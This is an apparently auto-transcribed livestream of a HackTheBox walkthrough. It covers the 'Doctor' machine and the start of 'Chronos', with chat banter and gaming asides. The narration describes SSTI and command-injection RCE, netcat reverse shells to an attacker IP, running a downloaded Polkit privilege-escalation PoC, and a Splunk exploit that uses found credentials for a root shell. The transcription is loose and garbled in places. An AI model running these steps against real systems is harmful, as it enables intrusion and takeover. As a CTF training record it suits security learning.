Yo, boys, what's up? Not sure if it's a boy or it's a woman or what the girl. I don't know. So, how you going? Yo, what's up, brother? Happy New Year to you. Well, it's been already 21 days since the New Year, but whatever. Happy New Year. So, how's your starting of the year going? Mm-hmm. Share this. I think you're not here, so let me put this way. Same to you, brother. Partner. Okay, back to the topic. Hello everyone, welcome back to the another live. If you're watching it after the live, still welcome back. So we will continue with the doctor, and with the same note we'll try to clean it up faster, or like by today itself, and see how we can do that. And I think I got one solution in my mind, because when I was taking a bath, so there's something pop up in my mind, though I'm not sure if it's going to work. But today we'll try stuff, if it does or if it doesn't. So let's, on that note, start with the box. And again, welcome back to the channel and welcome back to the live. And if you're new here, consider subscribing. Old one, like the video, comment, share, whatever. And with that, let's start. So so far we have got the user access, and we have the SSTI vulnerability in this box, and with that we also have the command injection in this box. And putting these two, as you can see over here, we have the first way to exploit it, and the second way is this command injection. The first way is using the SSTI payload. After that we went to the user access Sean, but we cannot SSH in that because Sean don't have the access for the SSH. But we tried to get the Sean access over the like RC that we got, and from there we actually start looking everywhere. Didn't got much, so we thought let's look in the logs, cause if the application is hosted and it is interacting with some application, it should be getting the logs, right? So from there we picked the logs, and here you can see this is the application interaction, and from here we found some post requests, as you can see, and I grabbed those post requests with from the backup file. And here over this request I found pretty interesting stuff, which is an email, and it seems someone by accident put the password into the email. So because of that, when we tried this password as a password, and over here if you'll see, so let's use this string to switch user, which I did, and over here you will see in this screenshot, when I tried to use the SSH didn't work, but when I tried to use it with the switch user over the RC that we had, we got the access. Now with that we also got the user.txt, but what comes after is how we're gonna perform the privilege escalation. So there we are stuck. So from here we'll continue and see what we can do. So let's get started. Open the stuff, restore it, and back here. Go to register, double A, cause it's not taking the single character. At the rate, sorry, A, dang it, A dot A, single string, enter. This is going to be our profile. We'll create a new message as we are already in the system. So let me check. I just changed the places where we file used to sit before. So I moved them from the home to the certain directory. We have hash, fonts test. I don't know what this is. We have the database over here. We have the test over here, and this is the ours. This is a shell that we created. If I'll do test, you will see this contains the RC in it. So we'll clear it, and we'll start the netcat listener over here. Let's start with that, and below will the split. We'll use the Python 3 server. As it's active, we'll call the stuff back. Copy this command injection, and it should be over the clipboard. Paste it here. Now we'll post it and get the RCE, and says login a at the rate a.a, next a login. No such luck. That's weird. Okay, there's some other stuff going on the other side. Double a at the rate a sign up. I think it was a previous session that it triggered before. It seems so. But if that was the case, why did it open this? Something must be messed up with this script that's actually running this part. So there we go. We got the RCE back. Get back here, copy this, paste it here, enter, and we'll call the Python shell to spawn the bin bash. We'll perform clear, cancel this, clear, collapse this subterminal, and what's next? Back to the doctor, all the way down. We have our session ready, and we was looking for a way to we can switch to the root, but we don't have the password. So how are we gonna do that? Let's try the password we have for now. Where is the password? This one. I don't think this is gonna work, but who knows. Yep, authentication failed. And if I do sudo su Sean, enter, we'll be able to access this user. Now clear it, home web, and over here we can try this, enter, grep, nothing in here. How about this? Nothing in here too. Okay, so we don't have much. CD, it'll take us to the home directory of Sean. Ls, we have linpiece sitting over here since yesterday, and even with the linpiece we did find some stuff. So let's run that again. /linpiece, enter. There we go. I think I didn't restart the machine. Yes, I'm the only one using it, so that shouldn't be a problem. Yo people, what's up? Those are watching, please like the video if you are here. Although I cannot set the targets right now because my views are not that much, but whoever is, please consider subscribing and liking the video. That would be great help. Okay, so as it says, red and yellow, 95% vector of privilege escalation. So if we found something with this color code, that means it is pretty possible that we can directly escalate the privilege. So we will go down and scroll, and we have sudo version outdated here. So let's copy this and let me open the private window of browser. This exploit, it is a heap based buffer overflow, not something that we can use. There's a root exploit. Let's see if any of these work. All research credits, Qualys. This is a blog. You can check your version of sudo is vulnerable to this. We need to sudo edit -s, yes. Bro, can you give me advice on how to learn Python? Done it. Learn Python. What do you know so far? Like, I don't understand when people ask how to learn something, cause if you're about like the programming language, at the end it is, yeah, it's just syntax stuff. All you need to do is consider like have a best knowledge of logic, how you can work around with logic and how you temper with the logic. So what did he say? Best is to hit CS50p, free by Harvard's, is the best stuff. I'm not a Python fan, to be honest. I'm more of a bash guy. Let's see, what's this? Introduction to Python. Okay, program Python. Okay, might be good stuff. You can try that. But to be straight, I'm not a like fan of a Python. Reason is it is limited and people are more dependent over the like dependencies which are already there, and you don't know when that dependency is going away. If it is going to deprecate today, if it's getting deprecated tomorrow, you have some code that is sitting there and you don't even know if it is like still running in the your organization or not. So because of that purpose, I don't use Python on the first hand. If it is something that's running over the Linux, I prefer using bash. And if it's something running over the Windows, I would say you should prefer using the like shell script. That way you will have less dependency over the other programming language, cause if you're using something that is like the operating system dependent, it will cause less trouble in the future. And it is more where you're working with the logic, like the pure logic, rather than you're using some sort of dependency to make it work for you. So that's why I don't use the Python on the first place. I do use for like small stuff. Let me show you some small stuff that I did. But if you'll see my repos over here, all you will see that shell, everything is shell. And there will be like one or two repos that says Python. So, bro, everyone should at least learn Python, C, C++, C Sharp, Bash, PowerShell, Rust, optional. Yeah, I'm not saying not to learn, but even if you're learning one language, that's good enough. The other language just hold the syntax that you're going to perform in a different manner. But at the end, what you're going to work around more with is logic. If you understand logic better, that how something is working, how it is getting called, all the like the end stuff is that you just need to understand how something is working, so you can easily switch. Not maybe easily, but it will take a month or two to understand how the other language syntax work, but it won't be that hard to switch over the other language rather than understanding how something working behind the scene because of the logic. OSCP C sharp, very important. Yeah, I'm like I said, I'm not saying it is not. You should polish your like algorithms and how the logic you can establish. Syntax is a not a long this stuff. It you can be learn it can be learned in month or two. Maybe if you are way too much good with the syntax and other stuff, you maybe learn it in a 1 week or 2 weeks, maybe in one day. It's depend on the person capability. Yes, but I'm trying to start somewhere, and my teacher told me Python is easy to understand, and then I could easily learn other language. Okay, give me a shot. Just give me a sec. Let me pull a small script that I just written previously. Okay, let's go with this one. And let's open this. Okay, I'm not sure if you are familiar with the commands and stuff, but yeah, this is a whole different syntax. A lot of people don't believe, but C is easier to begin with than Python. Yeah, actually, it's a fact. It is also better in a way that if you're learning and starting with the C, you will be able to learn more niche into how some programming languages are working. You will hardly see the pointer getting like highlighted that much in any other language as much as it get highlighted into the C. So pointer is kind of C stuff, and there's other stuff too that C also hold. Like C cannot work over the garbage collection, but C sharp and C++ does work on it. So like it is like mumble off stuff. And if you're going from the Python to the C, that would be like weird to yourself. Like you'll be saying it like it was easy over there, but it is not easy over here. So start with something complex, and easy will be becoming like you'll start feeling easy, more easier than anything else. But whatever, logic, work over the logic. The best thing you can try is go to the platforms like these. Where is it? CDF? No, it is something to do with okay, it's not over here, maybe in here. Programming. Yeah, you can try these places. HackerRank, this one. Elite Code is there. There may be some other stuff, and when you start understanding something, I would say if you're more of a pure programmer, try starting contributing into the open source community. That will help you in your engagement, and it will also help you improve your skills in a manner that you can start building your own programs. That's where you can hone your skill on a different level than you're working on your sole project or something. Because over there you will see the collaboration of multiple people that they're trying to put something in place. You're waiting for what, brother? I have already shared you the write-up. Wait a sec. Quest journal. Yo, where did your... Yeah, here it is. Yep, it is sent. Here you can see. I have already shared the file here, so you can check that. You'll get respect in community, and sometime you will get good donations. Who cares about donations, man? When you're working over the skill, don't ever think about getting a donation. That will temper your whole like agenda. Why the hell you are working on something when your main goal is donation? Who cares? Work on something that you think is worth investing, and learn something that you can think is make some anything that is not working properly. You can make improvement in that. And yeah, so my stuff is, I can just go with the two things. First, learn the logic, how something is working, especially DSA. After that, start working on some temporary projects that you think it is sufficient to learn, or use some lead code and other stuff. After that, start contributing in the open source community. Doesn't matter how much time you can put there. Half an hour is enough. 1 hour is enough. If you can, if you already know like what the hell is going on with the code. So 1 hour, half an hour, 2 hours is enough. People don't get it when they start looking for a job or something. Let's put the job in the side and like the skill. What better you can get when you're working in the open source community? They have pretty damn good projects that they are working towards a single goal, that they think that they can improve the society with that, and they don't contribute on other places. And that's the best place to learn if something is working and how it is progressing. That will teach you the ethics, how you can actually work with other people, and it can even help you build your clients. If they see that you have this many contributions, if they see that you have this beautiful code written there, they might even directly approach you to like help, ask you to build some piece of code, or maybe any asset they want. So this is the best advice I can give. I'm not sure if someone is over the internet is doing the same, but this is the best a person should go for. And I'm not giving the advice in free. Hit the like. The advice is paid. Pay with likes. I appreciate it, people. Any other question while I'm working on the box? I'll be here to answer. Okay, let's continue with it. There we have some good stuff. CV, NFT object, pawn kit. Yeah, this is something that I found yesterday. Let's see what this CVE is. It says privilege escalation with Polkit. Polkit privilege escalation. How does it works? Enter username to insert, optional, and password is optional. To skip vulnerability check and force exploitation. Enter custom sleep time instead of automatic direction. Format of time is this. If you want to set sleep time as this, note equal to symbol is equal to after specifying an option is mandatory. If it do not specify the option, then the script will automatically detect the possible time. We'll try to insert a new user using the time. Default credentials are these. If the exploit runs successfully, then you can log in su this, and you can spawn bash shell as root using sudo bash. I'm not sure if this is the intended way or unintended way, but we're gonna give it a shot. See how beautiful it looks when it's written in the bash, and it don't need any sort of dependency. You're just declaring the global variables that you're gonna use everywhere. Gonna provide those variables required stuff, some coloring, and here you're forcing the value, or like providing the value here, and from here your logic starts, and few hundred lines of code, and your system start works. So let's go to raw, copy this, split the window, and we're gonna do wget, paste this, and send it into the, what was that, Polkit, enter, ls. Oh, we have two files. Nice, nice, nice. ls, or maybe compare. And Polkit compare out input is not in sorted order. What the hell is this? I think this is the right command for compare, right? Compose, compress, composite, compile. Yep, this is a one. Okay, so we will do wget, not wget, but pw python this, and go all the way down. I don't know if I should be using the clear, but we'll do wget 10.10.16.3 / poc.sh, enter, and it got uploaded. ls chmod +x poc.sh, enter, /poc.sh, enter, and it says account service this installation found, Polkit's version appeared to be vulnerable, starting exploit, inserting username this, error this, authentication is required, Polkit this 170, this substring expression this, and unexpected argument 1, seed expression this, no previous regular expression, broken pipeline, insertion of username field, abort execution, usually multiple attempts are required to get the time right, try running the exploit again, We can run it as much time as you want. poc.sh. So we will copy this, enter. It looks like the password insertion was successful. Okay, let's see. su hyphen, we don't need the hyphen. Let's copy this, paste this, enter. And the password, it says over here, one more back. It says the password is this. Paste, enter. Okay, we got it. Now it says run a command as administrator, user root, sudo root, enter, and we'll provide the same password, and it says command not found. So sudo bash, enter. Who am I? I'm a root, and this way dang it, this is like a total different way how we should actually have successfully solved this box. Dang it. But whatever, let's go to the root. ls cat root.txt, enter, and we got the stuff that we was looking for, and we will copy it till here cause we pulled it from here. In the notes we gonna go all the way down and such, paste, cut it, paste it here, and submit it here. Now we will try to check how we can actually like what is the intended way to solve this box. I think the piece of cake people are those who actually use this same trick to escalate the privilege. Not sure though, but now we have the escalated privilege. Let's see, ls-la. And the weird thing is that we don't have any SSH over here, and you cannot even see the bash history because it's going to the dev null. So everything in the history has been sent to the dev null after every second, I think. So let's see someone's write up how this actually got solved on the first place, and like the video, guys. Stop being like this. Don't be rude. Okay, so what box was it? DOC doctor dot hack the box. Let's stop. I think, yeah, I was talking about something previously that when I was taking a bath, I remember something, and that something was let me see if that's the thing, and I forgot actually again, and now I remember it back before I start looking at the write-up. So we have this Splunk over here. We never try to log in back into this using any sort of credentials, which we already have one set of credentials, and we have this Splunk build, and we didn't even check if this contained any sort of exploit there. So what you're gonna do is go here, not on this one, in this browser, paste this, and we'll check for the exploit, enter, and it says Splunk remote code execution. Okay, we have something here, and if I'll go Splunk Whisper 2, when this got updated 3 years or 5 years back, And what does it says? Local privilege escalation or remote code executions, Splunk universal forward misconfiguration. See this. Okay. For more details, which one to use? You have local shell on a Windows computer running Splunk. No, we don't have the Windows one. You can contact remotely Splunk. You have API port this by default. You have credentials. Okay, we have credentials. Note the default credentials are admin change me, but they do not work remotely by default. Use this script then. Okay, this has the two sets of script. Yeah, this one, and it's in Python. We'll check that too. And what does it say is, let me show you something. If we'll check this code by itself, you'll see how many dependencies this code is using actually. See? Total 7 dependencies it's using. And how big this code is? 50 lines almost. So rather using this many dependencies, you could have only used the local tools and other stuff to perform the same action. But who cares? Everyone enjoys their comfort zone. So who am I to comment? We're gonna use this one and raw. Go for it. Copy this. Oh yeah, we can check if those credentials are working, right? So we will go here and we have SHAUN Sean and is G wait, let me download it. Git clone, paste, enter. Oh no, not git clone, wget, paste, enter. Okay, we got the file. ESCLATE privilege using Polkit. I think this is right, what I'm writing, correct? That's what we have exploited. Regular expressions and let's go bit up. We should be able to find the CVE here. There we go. Where was it? Okay, not this one, the Python one, but the Polkit one. Where is it? Here we go. There we have it. And it's a part of what? It just listed there? Yo, that's weird. It just sitting there. It doesn't represent or something. But we have over here Polkit. Let's go with this. No. We will use this Polkit, and we are gonna use where the hell is it? Actually, before we do anything else, I wanna do this. Throw this crap, but there was this table, CVE and vulnerability. Over here, I'm gonna put the poll kit and open this ex colon doctor CTF. Here as such, we're gonna give the stuff here with the script so we don't lose it in the future if something happen. And back to the previous page, it's in the doctor, not a docker, doctor, right? And its CVE is here. Copy this, paste it here. So we have the poll kit CVE here. Now what we're gonna do is I was trying to log in over the stuff, so we will go back over here, login Sean, and we have the right username and stuff. And if I'll go, okay, it is working. I think we messed up some stuff over here. I didn't check if we can log in using these credentials, but we are. So let's zoom in a bit and copy this whole page. And in bigger, got in using the creds of Sean, which is Sean colon guitar. And we will go over here, escalate or revesk using, what the hell is this? Splunk. So let's try the Sean creds over here on the port 8089 Splunk and see if we can log in there. And we're gonna post or paste this here. And if we'll go to login Sean, copy this table, privilege escalation using Splunk. There we go. Put that back. And we are in. Now, we did Google earlier. And we found that it's vulnerable to RCE. So let's download that exploit and try using that to perform revesk. On this box. So we can go root wget. We need that script or this endpoint found this over the GitHub. This one. Yes. Guys, another request. If you are looking for my notes, I would say contribute over the what that place was. I'm not forgetting. Buy me coffee, so I can like have enough donation or calculation that I will be able to buy the sync service for this. Rather sync service, damn it, I'm a publish service. So I'll be able to publish my notes there. And for that, if you'll type support in the chat, you will get the link. So you can get it if you're up to. Otherwise, we are good. No problem. Okay. That is this Splunk version is vulnerable. And what version is this? If we'll check here, this is a build. We'll put it in here. There we go. So we have this, and if I'll go here, let's do wget paste wget all the way here and enter. Copy this, paste it here, and we're gonna fix the name, resolve, whatever. Now that we have this code over the local, let's try use it for Prevesk. Dang it. So yeah, we have this too. So we'll go from here till all the way down. So we can also add that we use Polkit to exploit it. And actually we already have triggered the exploit. What we need is just the output of this. So if we go here and paste this and do this, quite much space has been gone. Remove this, backspace, and what we're gonna do is hold here and go all the way up, way down up, until we get that CVE. Read write permissions, it was just lurking alone at the side. I just remember that. Let's clean till here. Processes, memory. Sean, we didn't check this over here, and this is what we have. Container, and we're gonna put snip over here. Snip. There we go. We have a pretty damn good snip. Copy, paste. Oh. Found this in color code. Wait. We have all these exploits there, which is this system is vulnerable to. So we'll go more up and basic information, pipe and etc. Till here. I'm not able to recall, did we use the poll kit or we used this pseudo version exploit? Wait, let's see. We went to the... Oh. No. Yeah. We did the poll kit one. No, it wasn't related to the sudo. So we can clean till here. And what we're gonna do is also clean this garbage stuff. And remove computers permissions this. Okay, so we have where is it with the color code? Dang it, where's the color code? This red and yellow. And where is the hell? How are we gonna highlight this? Like this? No, it's not able to highlight. I want to highlight this. Bold. It's not working. We had a snip over here. So we'll copy this snip and put that snip over here. There we go. Found one CVE here, which is this one. Continuation. Over here. Hashtag pollkit. Here, when I thought we have the username and credentials, why not try them over the Splunk and see if we can log in there. So from here, the privilege escalation starts. And I'm not sure if it's gonna work, but just finger cross kick. If it worked, it worked. If it didn't work, it didn't work. We're not gonna take stress on it. So clear. Oh, we need to exit from here. Exit from this user too. Going back to the Sean. ls. Now we have downloaded this. We need to start the not wget Python server here, and copy this full and perform wget 10.16.3 / paste enter. Upload it here. Now upload it over the RCE machine. Or do we need to upload it there? I'm not sure if we need to. If we'll go here. Here just gonna ask for some good stuff, I believe. So we have the schema port and stuff. The remote one is this, and it's looking for the argument lhost or host lhost. Required true. This is our own IP address and default port, the username and the password, and the payload. You must adapt for the Linux target. Why the hell should I adapt for the Linux target? It should be your script that should be adapting the Linux target. Isn't it a bullshit? Which program we can trigger over here? So let's try this. Python 3. I hope it is under Python 3, right? If we'll go here, it just says import, doesn't mention if it's Python 3 or not. Is there any other exploit? Oh, here, there's another one. This is also in Python, Splunk RCE POC, and it seems to be holding the same CVE. Does this have the CVE? It didn't mention here. So I assume this is going to be the stuff that you're working with. And it's just 2 years back. Nathan, good work, brother. And total 25 forks, not bad. So let's just go here, get in here, and we're gonna delete this screenshot. Oh, we didn't put the screenshot yet. So we're gonna change this. Oh. Till here with this file name. No. I think we are cracking stuff up. We'll go to raw. copy this here, paste, and the file name is going to be this and this, and the file size is going to be different, so we will do just this. Oh, why the hell I'm like putting so much efforts. wget, paste, enter. No, sorry, being an idiot. Enter. Got the file, copy till here. This is the fastest way. Sorry, being an idiot. Okay, now let's try trigger this using the creds and the required parameter for this script. And we are going here. And the best thing to do is you should always fork some code that if it has already worked somewhere, so you don't lose the program. Even if in future he or she someone made any changes, it is there for you. So we'll copy this and gonna put it here, and we're gonna just copy the same stuff, sh, paste, Python 3. This is going to be the URL of the Splunk, not the services, just still here, and username is going to be SHAUN, Sean, and something guitar 123, IP address, reverse shell IP address, which is going to be our IP address, I guess, 10.10.16.3, and reverse shell IP address port 9001. And before we run this command, it seems we need to start the netcat listener here, and using netcat. Another cool stuff that I'm obsessed with now is we can just do this. And the other good part is we will put hash, and it seems it is broken because of some stuff. Delete this, open this, and we're gonna remove this info and part. So we will do h this space info. We'll just do this. Listener for the virtual connection. On Windows. So we will go back to the doctor and get here, enter netcat listener, exclamation, and it's still dropping everything, which we do not want. So we will go here and we'll put a split here. I think that can fix it. No, it still didn't got fixed. Shell to run later once get the RCE. Okay, now is it fixed? Yes, now it's fixed. So we're gonna start the netcat listener. Netcat. This is more of what I like. Oh, sorry. This, and over here we will cancel this, clear this out, and gonna start the netcat listener and clear over here. As it's running, we gonna copy this command and paste it here, enter, and it died. Why did it died? File this pool library in mark request, self-validation connection. It says validation connection isn't able to validate. Let's check how it's running for this user. So the netcat listener is running. We provided this stuff. Port admin password, IP address where it's trying to connect, and the port number. VLP, LVNP, it's same stuff, brother. So what's the problem here? Run this again. It is breaking for some reason. I don't know what's the reason. Is it because of this? Sean. Or maybe because of this. Enter. Connection 10.10.16.3. Yes, it is. It seems pretty good. Okay, it's not running here. So that means we need to upload it over here. Let's clear this out. We will do the Python 3 hyphen this and wget 10 dot any message. Okay, no message. 10.16.3 slash the file over here. This is going to be the file. Enter. We have uploaded the file over here, Sean, and we will check here. Later on we will check if it was required or not, but for now this is the best I could think of. Okay, so it is there, and IP add. What's the IP address of this machine? Local. What if I try this in a way? Using this itself, I think this should work without giving any problem. So, okay, this script is broken and the script is not working. Host doctors.http. Let's try localhost. Will this work? Even that didn't work. Maximum retries exceed with URL. Account login. Return this caused by SSL error. SSL certification verification error. Okay, so I'm not sure if this person has the SSL related issue patched in this script. This Splunk token and stuff. I think that's the reason why it wasn't working. If I'll do with the HTTP this, enter. Okay, it didn't work, broken, and now it still didn't work. Cancel this, clear, paste here, and we'll do, instead of the URL, let's try it with the IP address. Enter. Okay, it's still breaking without much efforts. So I believe this is going to be the part. So let's go over here, Sean root. Okay, so I was right. We are going right direction. He used this Splunk Whisper 2 from this user. I hope it is still there. So we will do wget, paste here. Oh, it's a git clone. I don't want to do the git clone. I just want to download this script. So we will be using this one, Python. Did he also made edit? It seems to be pretty similar in a way. Let's check what's next he did. Okay, he is using the payload over here. But in the payload, he gave this. So if we will try with ours, cause the script we have right now does not contain any of this. I don't want to kill this shell, so we will do ls vi pys, enter, and go bit down. we can define the payload in this. But we'll do it in the advance, so we don't have to worry about that later. Pawn.bad, this is going to be the, oh, it seems to be example. Okay, let's go back then. Quit, enter, clear, Python 3, py this, enter, hyphen schema, scheme, this is going to be nothing here. Okay, we need a host, which is over here. I hope this has worked around with how this is going to work. We will give the host this one. I hope we are doing right. Yes. Lhost is Lhost is going to be our IP address, which is 10.10.16.3 hyphen L port is going to be the 9001 space. Username is going to be SHAUN Sean. Password is going to be guitar something, guitar 123. Oh, we messed up. No, we saved it, and I think we gonna do this. Pretty damn big Control Z. Yup. Now let's fire it locally. As such, and we have Sean and everything. And the last set of command is going to be the payload. Yeah, this is the payload, and payload is gonna contain the RCE of our bash, which is going to be this, like in this straight manner. And we have our netcat listener running over here, so we will press enter, and it says unrecognized payload, so we will use a single quote instead of double quotes because it's taking it as an argument. But now this is gonna create a problem here. Sheesh. Enter. I'm using the same thing, right? Or maybe the mistake is we are not giving the right IP address over here too. It's 16 dot, dang it, dot 3 and 9001. Enter. Just let's see. Although we have already routed this box, let's see what does this brother says. What's up, Krishna? How are you doing? Uh, already solved the box, but now I'm trying to look for the intended way how it actually should solve itself. So just working on that. Try this instead. I don't think this is gonna work. Yep. I'm just thinking that how it could work if we are not going the intended way, because when we are giving them, it doesn't mean how we are getting in the box. It's just we need to use any mean necessary to get into the box. So it's not like they will fail you if you are not using the way they want you to use. So that's what was in my mind, and I went accordingly. Okay, it tried to use this. We will clear all this till here, and ping -c 10.16.3, and instead of this we will use sudo tcp dump tune 0 kali and hit enter, and it died immediately. I'm not provide any sort of cushioning here. Oh, okay, my bad. Yeah, I think I believe we messed up here, so we was using the wrong stuff. Now we will be using the right stuff here. 13 dots, oh sorry, 16.3, and over here also 16.3, enter, and yes, it is working. We was using the wrong script. My bad people. Sorry. So we will do netcat, enter, and same stuff, clear all this till here, and we're gonna use the bin bash, which is this, put it here, 316 and 9000, sheesh, 1, enter, authenticating, triggering the script, installing something, return to cleanup, and if I'll press return, removing the laptop, bye-bye. Okay, we need to wait here. Oh, again, wrong stuff, it seems. Again, wrong stuff. Installation app, this is the IP that we gave, and this is the port, but that's that's not how it should be working. So no, actually it should. Over here he did it the same way, netcat at root shell connected, but it didn't work for us for some reason. So if I will guitar Sean IP address possible because of this 89. Yeah, maybe enter. Okay, died. Enter. Authenticating, installing. Okay, there we go. We got it. We got a root. Who am I? Enter. So the first way we did was unintended way, and this is the intended way and how it should work. So we'll capture this and we will paste it here, or maybe paste it here. Remove it, and we're gonna copy this till here and paste. Now we are good. Or maybe this whole stuff itself, which will be better. Yep. Removing the app and stuff so we don't have any sort of backup remaining there over the system. There we go. Okay, so now we have solved the box, the intended way and unintended way. And we have two ways to break this box. And over here we're gonna remove do not, just bit of spelling fixes and stuff, and here. So we will go over here, action, and get down here. And from here, risk using Splunk, which we actually did. And over here we found GitHub exploit for Splunk. There we go. And you can read more over here. And we're gonna put stuff, how it actually worked. So let's clear all of this, get here. And there isn't any explanation how it worked. So remediation, we don't need that. Splunk universal hijack. Okay, but who cares? We got the place, so now we don't have to check further. GitHub. So there we go. We finished this box all the way up. Netcat, and we're gonna use over here whole kit, Splunk, exploit CVE. Let's see, whole kit, Splunk. What other did? What we other did is SSTI. Command injection. What else? Okay, we have the Apache 2. What else? What else? What else? What else? Python and work Zug. Okay, and the tool we used was... Oh, we didn't add the CVEs here. So we will get the CV from where? The first one should be the poll kit. Does this contain the CVE? No, it doesn't. So in the live action from this, we need to pull the CVE out. Lin piece. Where is it? It was here somewhere, right? Yeah, there we go. Or the poll kit. CV this all the way up, and we're gonna put the CV over here. And the next CVE we have for the Splunk, which is going to be, let's see if this contains CVE. Over the blog, find CVE. Okay, it's not here. SPLUNK. The version number, exploit here. And if we'll check, this has 4 CVEs, and I hope it is the same thing that we are looking for. Is it from the same person? System parser, etc. And if we'll check here, no. I think it's this one. Remote OS and whatever. But this seems to be pretty different. It doesn't seem like. Does this have? Actually, he is doing in the same manner. So I assume it is same. And it says 2023. But as per this script, it is like 2 years back. No, it is way damn old. Does the box mention which CVE we hit over here? Splunk Universal Port Forward. We have the SSTI, clear text credentials, misconfigurations. What else? Doctor is the machine. CVE. Don't tell me it is taking from here. Yep, it's taking from here. So you will go with this one. No, this one. as we are using this script for exploitation. Paste. We'll change the model. Okay. Cancel ChatGPT. Now help me get the CVE. The CV you're referring to is likely this, which affects Splunk Universal, allowing this to improperly. Okay, so we got the CV, and there are two CVs for this. So we will put both of them here and remove this unwanted asterisk signs. 6 is there and 5, 7. One is this and one is this. Now the tool we used, we use the Python server that we usually do. We use the linpiece. Cancel this, cancel this. We are already clear with this, so we can collapse, cancel this. We are good. So collapse the subterminal. Clear. We are done with the box. And how much time it took? I think it didn't took more than like 30 minutes or 45 minutes, but we are almost about to reach 2 hours because we tried the intended way. So because we need both sides of knowledge. Other than that, what we use? We use the grep pretty often. Any other tool that we use today? Yes, we use the burp suite for request to capture. That way we was able to perform the same action multiple times. What other? Yes. Not a crack map. Crack station. If I do this, will it work? Crack station in here. If I'll do this, get here, not here, then here, copy the crack station URL into the nodes, edit it, paste, save. Okay, it didn't work, so this looks weird. We're not gonna do this. Crack station, C capital, S capital, crack station. For password crack. Guys, tell me what else we used. You guys are sitting with me like for past many days. Sheesh. Linpiece, GitHub, wget doesn't make any sense to be there. And it is ready for publish. Oh yeah, we didn't put the command injection here. Burp suite is not here. Crack station, we just added. Linpiece, maybe. Python. Oh, Python is already there. We have Sheesh. SSTI. We have this Splunk there. I think we are good. Exploit. Yeah, we also checked the Apache 2 logs for the password that we are using right now. So this make the whole circulation off. Guys, like the stream. Don't be like that. Okay, so we have a pretty decent set of information now. Let's close this. Now the next box is going to be the buff. Remote I have already done. And it seems I have done it pretty good. Okay guys, over here we are back on the Linux. Pick one and we're gonna solve that from the easy or medium, not the hard one. We are short on the hard one, so from the easy or medium. Now we're gonna start some challenging stuff, so give a shot. Any name you like, shoot it. We'll start with that. Found any? I'm waiting. I'll wait for like 10 more seconds and I'll start the next easy. Or maybe the first medium. Okay, no response. It's been a minute. So we're gonna do Chronos and put the template here. It's a Linux and medium box. Chronos or the machine. We're gonna kill this machine and submit the matrix. Real life applicable, yes. Common vulnerability, no. Enumeration was 10 on 10. Real world application, real life applicable, yes, it is pretty much real life applicable. And we are good. Now we'll put the Chronos here and there we go. This has a guided mode, but we're not gonna with that. So let's go to the machine URL. It's under live. I think I should separate the live with OSCP live, correct? That would make better sense when this live is actually, or what live is that actually. Any good episode today for me to watch? This is finish. Anything here? Taking time. Refresh again. Till then, let's let it work. Okay, start rendering. Oh, we have this one, and we didn't watch yesterday this one, and this. I think I'll put this on hold. We have 2 episodes for today. Nice. What you doing, kids? There. Guys, subscribe. We reached the 800. 200 more and we are 1000 subscriber family, or like 1000 subscriber hacker or whatever. Security engineer. Hacker doesn't sound good. We are 1000 subscriber security engineer. Okay, machine is started, so I think my live stream is going pretty damn back, so we'll reach with the same time sync. Machine is there. Put it here, and IP address. I don't think we need the host name though, but I'll still hold it here. HTTP, and copy this, paste it here. cd dot dot mkdir cronos, enter, clear cd cronos chronos, and we'll start the nmap. And we forgot to add the foothold in the previous box that we done. Register over this, and from here we started working over the foothold. There. Okay. We are getting the DNS IP address too. 53. If we check here, what's the 53 IP address is? Oh, sorry, port number is. It is DNS resolver. I hope we don't have to do anything with the DNS resolvers. Oh, shh. I totally forgot. My bad, bro. My bad. Start taking breath. We have port 22 and the port 80. What do you think, guys? What's gonna be? Start subscribing, like the stream. Seems I'm pretty inside the chair. Dang. Sit straight. My tailbone hurts because I sit all day long here. I sit straight, like how much, for how much time? 12, no, 12 is way shorter. More than 8 hours, I guess. We got our stuff. Okay, let's start. We got the port 80. Let's see what we have there. clear this out. Cat and map. We didn't miss any information, right? Seems we didn't. There. DNSNM. Maybe this will be able to find us something. DNS record query. DNS recon. -D. We don't have any domain name. We have IP address. Could not resolve. Domain name is required. NSC bind. Let's see. Dig. And dig the same at this. Connection error. There is a command related to dig. Where is it? DNS. AAA is not gonna cut, so we need -X. What information we got? The question. We didn't got any sort of answer in revert. So instead of -X, let's see this one, AXFR. I think it need the domain name too with this. Yeah, I knew it. At transfer failed. If I'll just do at connection error. Yep. Okay, we'll check later if we need to add the host name and domain name into the as the host. We'll check that later. By then, like the stream, guys. That's the only thing I'm asking. I'm not asking for much, am I? So we have this Splunk running here, which we don't need anymore. But we have the IP address. So let's see what we have here. And boom, nothing. So we'll go back to the Chronos. And we got the Apache 2 running there. Let's perform FUF to see if there is any endpoint. We are going to tweak. So for that, we gonna do FUF scan, and FUF gonna take the IP address. No. Don't be a bad boy. For this, and it's a Linux, so we're gonna remove Windows stuff. And the Windows stuff is starting from this DLL bat till here. And after that, PSM1 varchar class JS is needed. So anything else that you find is for the Windows. And over here, fuzz. No, not fuzz. Chronos fuzz. Yeah, this sounds good. Copy this. Go here, paste, backspace, there. Whoa. How you guys are enjoying so far? Is it good? Is it bad? What is it? Share something. Whoa. So much garbage. Hyphen F L. And for some reason, I think we need to add the etsy host here. I have a gut feeling that we are going to work with some sort of subdomain that is going to be here. That's what my gut feeling is saying. I'm not sure, but maybe. So let's filter this out. First, we'll check for the endpoints if there is any endpoint that we need. But there's a strong gut feeling we might be working with the subdomain. By the time it finish, if you guys have any question, I'll answer it. Otherwise, like, subscribe the channel, and share with this other, so maybe other can benefit from too. And till then, I'll check the messages. Schedule around API threat stats. Who cares about API threat stats? Unless you're in org. Bogus skill. There is so much. Let's play Noita till then, by the time it pull the stuff. Noita. You guys must be thinking, what a weird game I'm playing, right? Everyone thinks the same. I was telling someone that I play this. He was also thinking the same. Let's go. Continue. Actually, I was wandering around on some planes and I went way too far. and eventually died. Whoa. Oh. We messed up, we messed up. I knew it. It's still running the scan. We got index.html. What good is it? I got the one file which is in text.html. I don't think we'll be able to hit any other, but let's let it do its work. Oh, there are some blasts going on. Here comes the combination. Bad guy. Oh, sheesh. Damn old man. Nice treasure chest if I'll get like sufficient amount of gold. Oh, nice wand. But degree is bad. Nice. Oof. Two less gold. But whatever, let's leave. This one is much better. $200. Okay, we got the result, but didn't got anything. Let's try with the big. Maybe this will be able to find something. We cannot buy anything. You gain 2 random perks. Let's see. The first perk is Bloody Slime. Dying enemy release rat to serve your binding. You bleed slime, but slime no longer slow you down. You have lighter projectile resistance. I'll die faster. Throw it inside. Who cares? Not getting anything. Oh. It's still running. Let's see what we can do. 